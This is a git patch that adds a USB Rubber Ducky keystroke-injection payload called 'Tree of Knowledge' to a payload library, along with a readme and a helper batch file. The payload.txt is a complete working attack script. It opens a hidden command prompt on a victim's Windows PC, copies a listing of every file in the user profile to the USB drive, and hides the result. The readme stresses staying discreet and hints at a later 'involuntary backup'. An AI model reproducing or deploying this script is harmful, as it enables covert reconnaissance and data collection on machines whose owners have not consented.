From e84b1b13381d414d6c09b138c1ee8377e5cf2ef2 Mon Sep 17 00:00:00 2001 From: Alex007-CyberGuy <87278514+Alex007-CyberGuy@users.noreply.github.com> Date: Tue, 10 Aug 2021 22:24:42 +0200 Subject: [PATCH] Gain knowledge from the Tree (#12) * Useful Reconnaissance Payload New payload based on the potential of the "tree" command. * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Delete library/payloads/recon/Tree of Knowledge/Bonus directory I removed the exe * Update readme.md * Rename library/payloads/recon/Tree of Knowledge/readme.md to library/payloads/recon/Tree_of_Knowledge/readme.md * Rename library/payloads/recon/Tree_of_Knowledge/readme.md to library/payloads/recon/Tree of Knowledge/readme.md * Delete library/payloads/recon/Tree of Knowledge directory * Gain knowledge from the Tree Grabs the names of all the files on a victim's pc and hides them from prying eyes. --- .../recon/Tree_of_Knowledge/payload.txt | 13 ++++++++++ .../recon/Tree_of_Knowledge/readme.md | 26 +++++++++++++++++++ .../payloads/recon/Tree_of_Knowledge/show.bat | 2 ++ 3 files changed, 41 insertions(+) create mode 100644 library/payloads/recon/Tree_of_Knowledge/payload.txt create mode 100644 library/payloads/recon/Tree_of_Knowledge/readme.md create mode 100644 library/payloads/recon/Tree_of_Knowledge/show.bat diff --git a/library/payloads/recon/Tree_of_Knowledge/payload.txt b/library/payloads/recon/Tree_of_Knowledge/payload.txt new file mode 100644 index 0000000..9f1faca --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/payload.txt @@ -0,0 +1,13 @@ +REM Payload created by Alex007-CyberGuy +REM Check the readme.md file for more info on the payload and what is does. +DEFAULTDELAY 250 +DELAY 3000 +GUI r +DELAY 400 +STRING cmd /k "mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr "USB"') do set myd=%d&echo tree /a /f > echotree.cmd" +ENTER +DELAY 350 +STRING echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit +ENTER +ALT SPACE +STRING n \ No newline at end of file diff --git a/library/payloads/recon/Tree_of_Knowledge/readme.md b/library/payloads/recon/Tree_of_Knowledge/readme.md new file mode 100644 index 0000000..28b77dc --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/readme.md @@ -0,0 +1,26 @@ +# Tree of Knowledge + +## Intro +This payload copies the names of all the files on a victim's PC, then puts them on a file on the root of the ducky. +In order to remove suspicion, the ducky also automatically hides the gathered recon info so that it can only be seen when the batch file is run. +This whole process is relatively discreet, bug free and can run and finish in a matter of seconds. +This payload is great for the first phase of a Pen Test, since it effortlessly shows you the contents of a victim's PC, which can then later be used for an "involuntary backup". + +## Requirements: +- Only works on Windows (7/8/8.1/10) +- Twin Duck firmware must be loaded +- The ducky must be labeled as "USB" + +## Viewing files +In order to view the gathered recon file(s), simply put the show.bat program onto the root of the ducky and run it. + +## Troubleshooting +1. Experiment with those delays. +2. Make sure that you don't already have a recon file saved from that computer. +3. ALT SPACE doesn't work on some encoders. Try using the java based encoder. + +### Tip +The inject.bin still works even if it is marked as "hidden". + +That's it folks! +I spent quite long in order optimise this payload, so enjoy! diff --git a/library/payloads/recon/Tree_of_Knowledge/show.bat b/library/payloads/recon/Tree_of_Knowledge/show.bat new file mode 100644 index 0000000..d6bf5cd --- /dev/null +++ b/library/payloads/recon/Tree_of_Knowledge/show.bat @@ -0,0 +1,2 @@ +echo off: +attrib *.txt -h /s /d \ No newline at end of file